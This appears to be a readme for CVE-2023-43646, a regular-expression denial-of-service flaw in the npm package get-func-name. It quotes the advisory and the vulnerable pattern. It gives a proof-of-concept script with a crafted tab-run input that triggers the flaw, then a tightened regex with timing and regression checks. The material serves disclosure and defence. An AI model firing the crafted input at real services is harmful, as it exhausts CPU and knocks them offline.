CVE-2023-43646 PoC — Inefficient Regular Expression Complexity in get-func-name

Source
Associated Vulnerability
Title: Inefficient Regular Expression Complexity in get-func-name (CVE-2023-43646)
Description: get-func-name is a module to retrieve a function's name securely and consistently both in NodeJS and the browser. Versions prior to 2.0.1 are subject to a regular expression denial of service (redos) vulnerability which may lead to a denial of service when parsing malicious input. This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input: '\t'.repeat(54773) + '\t/function/i'. This issue has been addressed in commit `f934b228b` which has been included in releases from 2.0.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
redos
Readme
# CVE-2023-43646



## Vulnerability Overview

- CVE-2023-43646

- CVSS : 8.6

- Sep 26, 2023

- ReDoS in node.js package

- Part of the rebob project

## Vulnerability Description

[github advisories](https://github.com/chaijs/get-func-name/security/advisories/GHSA-4q6p-r6v2-jvc5)

```
/\s*function(?:\s|\/\*[^(?:*\/)]+\*\/)*([^\s\(\/]+)/
```

This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input:

```
'\t'.repeat(54773) + '\t/function/i'
```

Here is a simple PoC code to demonstrate the issue:

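```
// Vulnerable pattern used by get-func-name before 2.0.1.
const protocolre = /\s*function(?:\s|\/\*[^(?:*\/)]+\*\/)*([^\s\(\/]+)/;

const startTime = Date.now();
// Long whitespace run followed by text that can never complete a match.
const maliciousInput = '\t'.repeat(54773) + '\t/function/i';

// The regex engine backtracks over the whitespace run from every start position.
protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");
```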


[target package](https://www.npmjs.com/package/chai)
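
A defensive counterpart to the PoC above, added here as an example and not taken from get-func-name or from the fix commit: it bounds the text handed to the regex and drops the pattern's leading `\s*`, the part that rescans the whitespace run from every start position. `extractName`, `MAX_HEAD_LENGTH`, the 512-character cap and the sample inputs are assumptions made for illustration.

```javascript
// Added example: hypothetical names, not get-func-name's actual source.
const MAX_HEAD_LENGTH = 512; // assumed cap on the text that may precede "("

// Pre-2.0.1 pattern: the leading \s* makes every start position inside a
// whitespace run rescan the rest of the run (quadratic work overall).
const vulnerableRe = /\s*function(?:\s|\/\*[^(?:*\/)]+\*\/)*([^\s\(\/]+)/;

// Same capture without the leading \s*. An unanchored search does not need
// it, so a failed attempt inside a whitespace run now costs a single step.
const tightenedRe = /function(?:\s|\/\*[^(?:*\/)]+\*\/)*([^\s\(\/]+)/;

// Return the declared name, or null when it is absent or when the input is
// larger than any legitimate function header.
function extractName(source) {
  if (typeof source !== 'string') return null;
  const paren = source.indexOf('(');
  const head = paren === -1 ? source : source.slice(0, paren);
  if (head.length > MAX_HEAD_LENGTH) return null; // bound the regex input
  const match = tightenedRe.exec(head);
  return match ? match[1] : null;
}

// Time both patterns on a constructed run of n tabs.
// Keep n small: the vulnerable pattern's cost grows with n squared.
function compareTimings(n) {
  const input = '\t'.repeat(n) + '/function/i'; // constructed sample
  const time = (re) => {
    const start = process.hrtime.bigint();
    re.test(input);
    return Number(process.hrtime.bigint() - start) / 1e6;
  };
  return { n, vulnerableMs: time(vulnerableRe), tightenedMs: time(tightenedRe) };
}

// Constructed benign inputs: both patterns must agree on the captured name.
const samples = ['function foo(a, b) {}', 'function /* note */ bar() {}',
                 'async function baz() {}', 'function () {}'];
function agreesWithOriginal() {
  return samples.every((src) => {
    const m = vulnerableRe.exec(src);
    return extractName(src) === (m ? m[1] : null);
  });
}

console.log(samples.map(extractName), compareTimings(2000), compareTimings(4000));
```

Doubling `n` in `compareTimings` should roughly quadruple `vulnerableMs` while `tightenedMs` stays near zero, which makes it usable as a regression check after upgrading to 2.0.1 or later.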